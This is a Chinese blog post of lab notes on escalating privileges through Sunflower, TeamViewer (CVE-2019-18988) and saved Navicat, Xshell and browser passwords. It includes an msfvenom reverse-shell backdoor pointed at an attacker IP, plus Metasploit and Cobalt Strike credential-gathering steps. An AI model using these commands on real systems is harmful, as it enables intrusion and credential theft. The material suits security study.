【权限提升】利用第三方应用Teamviewer&向日葵&Navivat-凭据

文章讲述了电脑或服务器上安装的第三方应用可能带来的安全隐患,特别是通过向日葵服务的漏洞进行权限提升。提权工具如CS被用于上传和执行后门,获取服务器的管理员权限。此外,TeamViewer的CVE-2019-18988漏洞也被提及作为提权手段。文章还讨论了密码提取工具对Xshell、Navicat和RDP等服务的密码获取,以及过时服务如FileZillaServ-u的安全问题。
摘要由CSDN通过智能技术生成
文章内容复现于小迪安全相关课程

电脑(服务器)装的第三方应用越多,安全隐患越大

远控类

利用向日葵漏洞提权 漏洞版本百度云链接

搭建:

为追求真实服务器环境,采用阿里云ECS弹性服务器搭建靶场(windows server2012 + phpstudy)

背景:

已有webshell权限,利用探针(查看端口,进程等)知道服务器安装了向日葵服务

tasklist /svc

提权工具-CS

上传后门,会连会话,这里由于搭建原因忽悠是administrator权限,当做是普通用户权限,且无法正常提权至系统权限

利用CS插件上传向日葵提权工具

上传

执行

机器密文就是验证码,使用Python高版本(大于3.8)执行解谜脚本Sunflower_get_Password-main进行解密。百度云链接

接下来可以使用向日葵远控软件直接连接靶机

teamviewer提权(CVE-2019-18988) 漏洞版本百度云链接

后门上线权限必须是管理员权限,低权限用户不能获取

使用msf模块获取id与密码

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.130.42 LPORT=3333 -f exe -o msf.exe   #生成后门
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run
run post/windows/gather/credentials/teamviewer_passwords

使用cs插件获取id与密码

密码类

各大浏览器 Xshell Navicat 3389 等

主要是使用cs插件直接进行提取,获取到相关密码

服务类

FileZilla Serv-u(漏洞太老了,已经淘汰了) Zend等

后续再补……

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值